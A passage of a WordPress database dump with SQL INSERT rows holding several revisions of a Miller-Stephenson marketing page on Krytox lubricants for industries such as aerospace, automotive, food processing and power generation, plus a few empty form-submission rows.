housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 20:01:28', '2016-09-28 20:01:28', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2134, 2, '2016-09-28 20:02:00', '2016-09-28 20:02:00', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n<br /><br />\r\n<br /><br />\r\n<br /><br />\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n<br /><br />\r\n<br /><br />\r\n<br /><br />\r\n<br /><br />\r\n<a name="aerospace">\r\n<strong>Aerospace, Aviation, and National Defense</strong></a>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 20:02:00', '2016-09-28 20:02:00', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2135, 17, '2016-09-29 02:26:54', '2016-09-29 02:26:54', '', '', '', 'publish', 'closed', 'closed', '', '2135', '', '', '2016-09-29 02:26:54', '2016-09-29 02:26:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/2135/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2137, 0, '2016-09-29 12:36:32', '2016-09-29 12:36:32', '', '', '', 'publish', 'closed', 'closed', '', '2137', '', '', '2016-09-29 12:36:32', '2016-09-29 12:36:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/2137/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2138, 0, '2016-09-29 13:03:57', '2016-09-29 13:03:57', '', '', '', 'publish', 'closed', 'closed', '', '2138', '', '', '2016-09-29 13:03:57', '2016-09-29 13:03:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2138/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2140, 2, '2016-09-29 13:55:01', '2016-09-29 13:55:01', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, 